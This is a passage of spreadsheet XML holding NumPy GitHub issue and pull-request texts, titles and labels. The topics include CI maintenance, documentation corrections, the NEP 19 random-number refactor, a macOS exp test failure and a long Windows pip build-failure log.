and Trusty is now no longer supported. This commit removes Trusty from_x000D_
the Travis-CI build._x000D_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</si>
  <si>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BLD: Remove Trusty dist in Travis CI build</t>
  </si>
  <si>
    <t>['03 - Maintenance', '08 - Backport', 'component: CI']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13870. _x000D_
_x000D_
We do not want to allocate 0 bytes (since it is not well defined),_x000D_
normally nbytes is 0 if the array is empty. But in case also the_x000D_
descriptor element size is empty, use 1 byte._x000D_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</si>
  <si>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MAINT,BUG: Use nbytes to also catch empty descr during allocation</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13003 _x000D_
_x000D_
The code path in scalarapi.c which checks dtype on one inheriting_x000D_
from np.void is especially awkward and was completely untested_x000D_
previously. So I am not sure we should even support it at all._x000D_
_x000D_
Closes gh-12982, gh-3614, and gh-12751_x000D_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</si>
  <si>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Do not crash on recursive `.dtype` attribute lookup.</t>
  </si>
  <si>
    <t>['00 - Bug', '07 - Deprecation', '08 - Backport']</t>
  </si>
  <si>
    <t>Try to expand the documentation around the need for the NumPy version to match the git repo version, based on feedback from sprint participants</t>
  </si>
  <si>
    <t>DOC: emphasize need for matching numpy, git versions</t>
  </si>
  <si>
    <t>In gh-13336 a check was added when building the documentation to ensure the numpy docstrings would match the documentation version by comparing the git version of the documentation to the git version of the numpy installed in python. This check ignored `PYTHONPATH` when checking the numpy version, which broke `make dist`_x000D_
_x000D_
This PR fixes it by rearranging the Makefile and using the `PYTHON` macro in `version-check`</t>
  </si>
  <si>
    <t>BUILD: adapt "make version-check" to "make dist"</t>
  </si>
  <si>
    <t xml:space="preserve">`warning` module was used but not imported in `numpy.polynomials.polyutils`. Tests were not catching this bug._x000D_
- Increase test coverage to trigger and check the RankWarning (including check of error message)_x000D_
- Add missing import statement_x000D_
</t>
  </si>
  <si>
    <t>BUG: Missing warnings import in polyutils</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t>We would like to attract contributions from people that are currently_x000D_
underrepresented in the developer team. In particularly with regards_x000D_
to skills in high level documentation or website._x000D_
As an attempt to reach more users, add this to the very visible_x000D_
README._x000D_
_x000D_
Briefly wrote this paragraph with Ralf, we can iterate on it._x000D_
_x000D_
---_x000D_
_x000D_
EDIT: Rendered file: https://github.com/numpy/numpy/blob/a066d6bc18a0ee467a21308180507fe1ac6f1d90/README.md</t>
  </si>
  <si>
    <t>DOC: Add a call for contribution paragraph to the readme</t>
  </si>
  <si>
    <t>the line _x000D_
_x000D_
&gt;&gt;&gt; c = np.full([9, 5, 4,3], True, dtype=bool)_x000D_
_x000D_
in https://docs.scipy.org/doc/numpy/reference/generated/numpy.matmul.html_x000D_
_x000D_
should be replaced with _x000D_
_x000D_
&gt;&gt;&gt; c = np.full([9, 5, 3, 4], True, dtype=bool)_x000D_
_x000D_
regards</t>
  </si>
  <si>
    <t>error in documentation numpy.matmul</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: Documentation', 'good first issue']</t>
  </si>
  <si>
    <t>Continuation of #13945 _x000D_
_x000D_
Document a workaround for using code to span pre-1.17 versions</t>
  </si>
  <si>
    <t>DOC: show workaround for backward compatibility</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12905._x000D_
_x000D_
Numpy arrays with metadata (including units for datetime64) can't have their type copied based only on the typenum. This change is in the array_setstate, where it does byte reversal of data from platforms with a different endian value._x000D_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</si>
  <si>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fix byte order reversal for datetime64[ns]</t>
  </si>
  <si>
    <t>When the read functions reach bad data the loop is stopped. This adds_x000D_
a check whether the file/string was actually read to its end, and_x000D_
if not gives a DeprecationWarning._x000D_
_x000D_
Closes gh-6076_x000D_
_x000D_
----_x000D_
_x000D_
Thought it would close more issues, I am not a specialist on file objects, but since it is here and probably works...</t>
  </si>
  <si>
    <t>DEP: Deprecate silent ignoring of bad data in fromfile/fromstring</t>
  </si>
  <si>
    <t>This aims to be a less controversial version of #12790._x000D_
_x000D_
* bump OpenBLAS version used in **all** Azure CI matrix entries to match current `numpy-wheels`_x000D_
* expand the `ctypes` check of OpenBLAS version to all POSIX-based platforms in Azure CI, rather than PyPy3-only_x000D_
_x000D_
For the Windows limitation, see the PR linked above, which probably didn't fly because of the rather large intrusion into distutils._x000D_
_x000D_
It would be neat if I could just declare a function prototype in a NumPy C header file for `openblas_get_config()`, and have that accessible from ctypes via NumPy after a build that links with `openblas.a` (the current way we build on OpenBLAS + Windows).</t>
  </si>
  <si>
    <t>TST: bump / verify OpenBLAS in CI</t>
  </si>
  <si>
    <t>In the interest of being even more explicit, per discussion in https://github.com/numpy/numpy/pull/13585</t>
  </si>
  <si>
    <t>DOC: clarify NEP-18's intent for __skip_array_function__</t>
  </si>
  <si>
    <t xml:space="preserve">There is a minor mistake in the documentation of [`np.take_along_axis`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.take_along_axis.html). In the "Notes" section there is a snippet functionally equivalent to the function that begins with:_x000D_
_x000D_
```python_x000D_
Ni, M, Nk = a.shape[:axis], a.shape[axis], a.shape[axis+1:]_x000D_
J = indices.shape[axis]  # Need not equal M_x000D_
out = np.empty(Nk + (J,) + Nk)_x000D_
```_x000D_
_x000D_
As I understand it, the definition of `out` should be:_x000D_
_x000D_
````python_x000D_
out = np.empty(Ni + (J,) + Nk)_x000D_
````_x000D_
_x000D_
With the initial `Nk` replaced by `Ni`._x000D_
_x000D_
### Reproducing code example_x000D_
_x000D_
NA_x000D_
_x000D_
### Error message_x000D_
_x000D_
NA_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.16.1_x000D_
</t>
  </si>
  <si>
    <t>Minor documentation error in np.take_along_axis</t>
  </si>
  <si>
    <t>With #13163 almost ready to merge, this updates the NEP with the terminology adopted there:_x000D_
_x000D_
- the **BitGenerator** is the class that generates a stream of random bits_x000D_
- the **Generator** holds a BitGenerator instance and can turn the stream of bits into ints and floats drawn from various distributions (uniform, normal, ...)_x000D_
- the canonical function to produce uniformly distributed integers is **`integers`** (as an implementation detail it accepts an `endpoint` keyword to produce open or closed intervals)_x000D_
- the canonical function to produce uniformly distributed floats is **`random`**, which parallels the use of `random.random` in the python (non-numpy) module.</t>
  </si>
  <si>
    <t>NEP: update NEP 19 with API terminology</t>
  </si>
  <si>
    <t>['component: NEP', 'component: numpy.random']</t>
  </si>
  <si>
    <t>Replaces #13163 by rebasing and squashing the commits. The end result should be equivalent</t>
  </si>
  <si>
    <t>ENH: implement NEP 19 random number refactor</t>
  </si>
  <si>
    <t>When I build numpy 1.16.3 with `clang version 7.0.0 (tags/RELEASE_700/final)` and `-fsanitize=undefined`, I got 2 runtime error:_x000D_
1. `numpy/core/src/multiarray/dragon4.c:877:36: runtime error: left shift of 1 by 31 places cannot be represented in type 'int'`_x000D_
2. `numpy/core/src/umath/reduction.c:57:19: runtime error: null pointer passed as argument 2, which is declared to never be null`</t>
  </si>
  <si>
    <t xml:space="preserve">For NumPy functions that make use of `__array_function__`, the appropriate the_x000D_
stack level for warnings should generally be increased by 1 to account for_x000D_
the override function defined in numpy.core.overrides._x000D_
_x000D_
Fixes GH-13329_x000D_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</si>
  <si>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Increment stacklevel for warnings to account for NEP-18 overrides</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13523._x000D_
_x000D_
I had an issue installing numpy from an enthought package called enable on MacOS high sierra and python 3.5 and python 3.6. It seems that subprocess is not imported where needed in the system_info.py file._x000D_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</si>
  <si>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distutils/system_info.py fix missing subprocess import (#13523)</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.distutils']</t>
  </si>
  <si>
    <t>@tylerjereddy reports the following test failure output from the latest master branch commit (8a421d9) when running full test suite on a Mac laptop:_x000D_
_x000D_
@r-devulap, @juliantaylor  - any thoughts?_x000D_
_x000D_
&lt;details&gt;_x000D_
_x000D_
```_x000D_
________________________ TestSpecialFloats.test_exp_values __________________________x000D_
[gw1] darwin -- Python 3.6.5 /Users/treddy/miniconda3/envs/numpy_dev_py36/bin/python_x000D_
_x000D_
self = &lt;numpy.core.tests.test_umath.TestSpecialFloats object at 0x11bccdac8&gt;_x000D_
_x000D_
    def test_exp_values(self):_x000D_
        x = [np.nan,  np.nan, np.inf, 0.]_x000D_
        y = [np.nan, -np.nan, np.inf, -np.inf]_x000D_
        for dt in ['f', 'd', 'g']:_x000D_
            xf = np.array(x, dtype=dt)_x000D_
            yf = np.array(y, dtype=dt)_x000D_
&gt;           assert_equal(np.exp(yf), xf)_x000D_
E           RuntimeWarning: invalid value encountered in exp_x000D_
_x000D_
dt         = 'f'_x000D_
self       = &lt;numpy.core.tests.test_umath.TestSpecialFloats object at 0x11bccdac8&gt;_x000D_
x          = [nan, nan, inf, 0.0]_x000D_
xf         = array([nan, nan, inf,  0.], dtype=float32)_x000D_
y          = [nan, nan, inf, -inf]_x000D_
yf         = array([ nan,  nan,  inf, -inf], dtype=float32)_x000D_
_x000D_
numpy/core/tests/test_umath.py:659: RuntimeWarning_x000D_
1 failed, 8641 passed, 63 skipped, 15 xfailed, 3 xpassed in 120.79 seconds_x000D_
```</t>
  </si>
  <si>
    <t>BUG: exp on macOS fails tests</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t xml:space="preserve">This should speed up some functions considerably._x000D_
_x000D_
Note: I'm also intentionally using this even (especially!) in functions that do not directly call np.asarray() on their inputs. This is so that overrides of __array_function__ cannot effect the internals of NumPy functions, which would be leaking our implementation as our API._x000D_
</t>
  </si>
  <si>
    <t>ENH: use __skip_array_function__ internally in NumPy</t>
  </si>
  <si>
    <t>- Update for changes in the past year_x000D_
- Make top-level headings clearer (interoperability, extensibility, etc)_x000D_
- Add "performance" as a topic_x000D_
- Give website and documentation its own heading (is important)_x000D_
- Remove typing and array scalars, doesn't belong here_x000D_
- General cleanup, fix ReST formatting, etc.</t>
  </si>
  <si>
    <t>DOC: roadmap update</t>
  </si>
  <si>
    <t xml:space="preserve">(1) AVX2 and AVX512F supports gather_ps instruction to load strided data_x000D_
into a register. Rather than resort to scalar, these provide good_x000D_
benefit when the input array is strided._x000D_
_x000D_
(2) Added some tests to validate AVX based algorithms for exp and log._x000D_
The tests compare the output of float32 against glibc's float64_x000D_
implementation and verify maxulp error._x000D_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</si>
  <si>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ENH: AVX support for exp/log for strided float32 arrays</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
Matlab has a function called complexrandn which generates a 2D complex matrix from uniform distribution. I need to use 2D complex number random matrix sometimes. Here is the code which I made to deal with it. It would be great if I could have it built in. You may like to also scale up to N dimensions as per the inputs given. Also, my code takes RandomState as an argument whereas you may like to do it like np.random.RandomState(513).conplexrandn()_x000D_
_x000D_
Thanks for your services to open source_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
def complexrandn(M,N,randomGen = np.random):_x000D_
    data = randomGen.randn(M,N,2).view(complex)_x000D_
    return np.array([ np.array([ complex(data[i][j]) for j in range(N) ]) for i in range(M) ] )_x000D_
_x000D_
randomGen = p.random.RandomState(513)_x000D_
x = complexrandn(2,2,randomGen) # To use a particular random stream_x000D_
y = complexrandn(2,2) # To use global random stream_x000D_
# You may like to do it as randomGen.complexrandn (It would be better for all)_x000D_
```_x000D_
_x000D_
### Numpy/Python version information: _x000D_
1.16.3 3.6.7 (default, Oct 22 2018, 11:32:17) _x000D_
[GCC 8.2.0]_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Request for Random complex number generator: complexrandn </t>
  </si>
  <si>
    <t>['01 - Enhancement', '50 - Duplicate', 'component: numpy.random']</t>
  </si>
  <si>
    <t xml:space="preserve">Update tests in ``test_ufuncs`` where some tests were labelled_x000D_
``fixme``. In particular this commit addresses two case:_x000D_
_x000D_
1. Invalid ufunc signature tests now test for value errors directly_x000D_
rather than via a try..except clause and have more descriptive test_x000D_
names._x000D_
_x000D_
2. Tests for generic loops now test for all types to be tested._x000D_
</t>
  </si>
  <si>
    <t>TST: Apply ufunc signature and type test fixmes.</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">Closes #13566 </t>
  </si>
  <si>
    <t>DOC: remove performance claim from searchsorted()</t>
  </si>
  <si>
    <t xml:space="preserve">Hi guys, _x000D_
_x000D_
I just change my workstation and need to install again all my deps, Trying to run pip3 install numpy, pip3 install pandas and etc, I'm getting an error about "Command "python setup.py egg_info" failed with error code 1"._x000D_
_x000D_
When trying to install flaskmysql, getting the same. Please view the full error below and some prints and specs about my workstation._x000D_
_x000D_
&lt;details&gt;_x000D_
_x000D_
```_x000D_
`C:\WINDOWS\system32&gt; pip3 install numpy_x000D_
Collecting numpy_x000D_
  Using cached https://files.pythonhosted.org/packages/93/48/956b9dcdddfcedb1705839280e02cbfeb2861ed5d7f59241210530867d5b/numpy-1.16.3.zip_x000D_
Building wheels for collected packages: numpy_x000D_
  Building wheel for numpy (setup.py) ... error_x000D_
  ERROR: Complete output from command 'c:\users\leo\appdata\local\programs\python\python38\python.exe' -u -c 'import setuptools, tokenize;__file__='"'"'C:\\Users\\Leo\\AppData\\Local\\Temp\\pip-install-vwlz4sc6\\numpy\\setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' bdist_wheel -d 'C:\Users\Leo\AppData\Local\Temp\pip-wheel-y10k7vky' --python-tag cp38:_x000D_
  ERROR: Running from numpy source directory._x000D_
  C:\Users\Leo\AppData\Local\Temp\pip-install-vwlz4sc6\numpy\numpy\distutils\misc_util.py:476: SyntaxWarning: "is" with a literal. Did you mean "=="?_x000D_
    return is_string(s) and ('*' in s or '?' is s)_x000D_
  blas_opt_info:_x000D_
  blas_mkl_info:_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries mkl_rt not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  blis_info:_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries blis not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  openblas_info:_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries openblas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
  get_default_fcompiler: matching types: '['gnu', 'intelv', 'absoft', 'compaqv', 'intelev', 'gnu95', 'g95', 'intelvem', 'intelem', 'flang']'_x000D_
  customize GnuFCompiler_x000D_
  Could not locate executable g77_x000D_
  Could not locate executable f77_x000D_
  customize IntelVisualFCompiler_x000D_
  Could not locate executable ifort_x000D_
  Could not locate executable ifl_x000D_
  customize AbsoftFCompiler_x000D_
  Could not locate executable f90_x000D_
  customize CompaqVisualFCompiler_x000D_
  Could not locate executable DF_x000D_
  customize IntelItaniumVisualFCompiler_x000D_
  Could not locate executable efl_x000D_
  customize Gnu95FCompiler_x000D_
  Could not locate executable gfortran_x000D_
  Could not locate executable f95_x000D_
  customize G95FCompiler_x000D_
  Could not locate executable g95_x000D_
  customize IntelEM64VisualFCompiler_x000D_
  customize IntelEM64TFCompiler_x000D_
  Could not locate executable efort_x000D_
  Could not locate executable efc_x000D_
  customize PGroupFlangCompiler_x000D_
  Could not locate executable flang_x000D_
  don't know how to compile Fortran code on platform 'nt'_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  atlas_3_10_blas_threads_info:_x000D_
  Setting PTATLAS=ATLAS_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries tatlas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  atlas_3_10_blas_info:_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries satlas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  atlas_blas_threads_info:_x000D_
  Setting PTATLAS=ATLAS_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries ptf77blas,ptcblas,atlas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  atlas_blas_info:_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries f77blas,cblas,atlas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  accelerate_info:_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  C:\Users\Leo\AppData\Local\Temp\pip-install-vwlz4sc6\numpy\numpy\distutils\system_info.py:638: UserWarning:_x000D_
      Atlas (http://math-atlas.sourceforge.net/) libraries not found._x000D_
      Directories to search for the libraries can be specified in the_x000D_
      numpy/distutils/site.cfg file (section [atlas]) or by setting_x000D_
      the ATLAS environment variable._x000D_
    self.calc_info()_x000D_
  blas_info:_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries blas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  C:\Users\Leo\AppData\Local\Temp\pip-install-vwlz4sc6\numpy\numpy\distutils\system_info.py:638: UserWarning:_x000D_
      Blas (http://www.netlib.org/blas/) libraries not found._x000D_
      Directories to search for the libraries can be specified in the_x000D_
      numpy/distutils/site.cfg file (section [blas]) or by setting_x000D_
      the BLAS environment variable._x000D_
    self.calc_info()_x000D_
  blas_src_info:_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  C:\Users\Leo\AppData\Local\Temp\pip-install-vwlz4sc6\numpy\numpy\distutils\system_info.py:638: UserWarning:_x000D_
      Blas (http://www.netlib.org/blas/) sources not found._x000D_
      Directories to search for the sources can be specified in the_x000D_
      numpy/distutils/site.cfg file (section [blas_src]) or by setting_x000D_
      the BLAS_SRC environment variable._x000D_
    self.calc_info()_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  'svnversion' nÆo ‚ reconhecido como um comando interno_x000D_
  ou externo, um programa oper vel ou um arquivo em lotes._x000D_
  non-existing path in 'numpy\\distutils': 'site.cfg'_x000D_
  lapack_opt_info:_x000D_
  lapack_mkl_info:_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries mkl_rt not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  openblas_lapack_info:_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries openblas not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  openblas_clapack_info:_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries openblas,lapack not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  atlas_3_10_threads_info:_x000D_
  Setting PTATLAS=ATLAS_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries tatlas,tatlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_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tatlas,tatlas not found in C:\_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries tatlas,tatlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
  &lt;class 'numpy.distutils.system_info.atlas_3_10_threads_info'&gt;_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  atlas_3_10_info:_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries satlas,satlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_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satlas,satlas not found in C:\_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries satlas,satlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
  &lt;class 'numpy.distutils.system_info.atlas_3_10_info'&gt;_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  atlas_threads_info:_x000D_
  Setting PTATLAS=ATLAS_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries ptf77blas,ptcblas,atlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_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ptf77blas,ptcblas,atlas not found in C:\_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries ptf77blas,ptcblas,atlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
  &lt;class 'numpy.distutils.system_info.atlas_threads_info'&gt;_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  atlas_info:_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries f77blas,cblas,atlas not found in c:\users\leo\appdata\local\programs\python\python38\lib_x000D_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f77blas,cblas,atlas not found in C:\_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries lapack_atlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries f77blas,cblas,atlas not found in c:\users\leo\appdata\local\programs\python\python38\libs_x000D_
  &lt;class 'numpy.distutils.system_info.atlas_info'&gt;_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  lapack_info:_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  customize MSVCCompiler_x000D_
    libraries lapack not found in ['c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\lib', 'C:\\', 'c:\\users\\leo\\appdata\\local\\programs\\python\\python38\\libs']_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  C:\Users\Leo\AppData\Local\Temp\pip-install-vwlz4sc6\numpy\numpy\distutils\system_info.py:638: UserWarning:_x000D_
      Lapack (http://www.netlib.org/lapack/) libraries not found._x000D_
      Directories to search for the libraries can be specified in the_x000D_
      numpy/distutils/site.cfg file (section [lapack]) or by setting_x000D_
      the LAPACK environment variable._x000D_
    self.calc_info()_x000D_
  lapack_src_info:_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  C:\Users\Leo\AppData\Local\Temp\pip-install-vwlz4sc6\numpy\numpy\distutils\system_info.py:638: UserWarning:_x000D_
      Lapack (http://www.netlib.org/lapack/) sources not found._x000D_
      Directories to search for the sources can be specified in the_x000D_
      numpy/distutils/site.cfg file (section [lapack_src]) or by setting_x000D_
      the LAPACK_SRC environment variable._x000D_
    self.calc_info()_x000D_
    NOT AVAILABLE_x000D_
_x000D_
  c:\users\leo\appdata\local\programs\python\python38\lib\distutils\dist.py:274: UserWarning: Unknown distribution option: 'define_macros'_x000D_
    warnings.warn(msg)_x000D_
  running bdist_wheel_x000D_
  running build_x000D_
  running config_cc_x000D_
  unifing config_cc, config, build_clib, build_ext, build commands --compiler options_x000D_
  running config_fc_x000D_
  unifing config_fc, config, build_clib, build_ext, build commands --fcompiler options_x000D_
  running build_src_x000D_
  build_src_x000D_
  building py_modules sources_x000D_
  creating build_x000D_
  creating build\src.win-amd64-3.8_x000D_
  creating build\src.win-amd64-3.8\numpy_x000D_
  creating build\src.win-amd64-3.8\numpy\distutils_x000D_
  building library "npymath" sources_x000D_
  No module named 'numpy.distutils._msvccompiler' in numpy.distutils; trying from distutils_x000D_
  error: Microsoft Visual C++ 14.0 is required. Get it with "Microsoft Visual C++ Build Tools": https://visualstudio.microsoft.com/downloads/_x000D_
  ----------------------------------------_x000D_
  ERROR: Failed building wheel for numpy_x000D_
  Running setup.py clean for numpy_x000D_
  ERROR: Complete output from command 'c:\users\leo\appdata\local\programs\python\python38\python.exe' -u -c 'import setuptools, tokenize;__file__='"'"'C:\\Users\\Leo\\AppData\\Local\\Temp\\pip-install-vwlz4sc6\\numpy\\setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' clean --all:_x000D_
  ERROR: Running from numpy source directory._x000D_
_x000D_
  `setup.py clean` is not supported, use one of the following instead:_x000D_
_x000D_
    - `git clean -xdf` (cleans all files)_x000D_
    - `git clean -Xdf` (cleans all versioned files, doesn't touch_x000D_
                        files that aren't checked into the git repo)_x000D_
_x000D_
  Add `--force` to your command to use it anyway if you must (unsupported)._x000D_
_x000D_
  ----------------------------------------_x000D_
  ERROR: Failed cleaning build dir for numpy_x000D_
Failed to build numpy_x000D_
Installing collected packages: numpy_x000D_
  Running setup.py install for numpy ... error_x000D_
    ERROR: Complete output from command 'c:\users\leo\appdata\local\programs\python\python38\python.exe' -u -c 'import setuptools, tokenize;__file__='"'"'C:\\Users\\Leo\\AppData\\Local\\Temp\\pip-install-vwlz4sc6\\numpy\\setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' install --record 'C:\Users\Leo\AppData\Local\Temp\pip-record-2b0a7hf1\install-record.txt' --single-version-externally-managed --compile:_x000D_
    ERROR: Running from numpy source directory._x000D_
_x000D_
    Note: if you need reliable uninstall behavior, then install_x000D_
    with pip instead of using `setup.py install`:_x000D_
_x000D_
      - `pip install .`       (from a git repo or downloaded source_x000D_
                               release)_x000D_
      - `pip install numpy`   (last NumPy release on PyPi)_x000D_
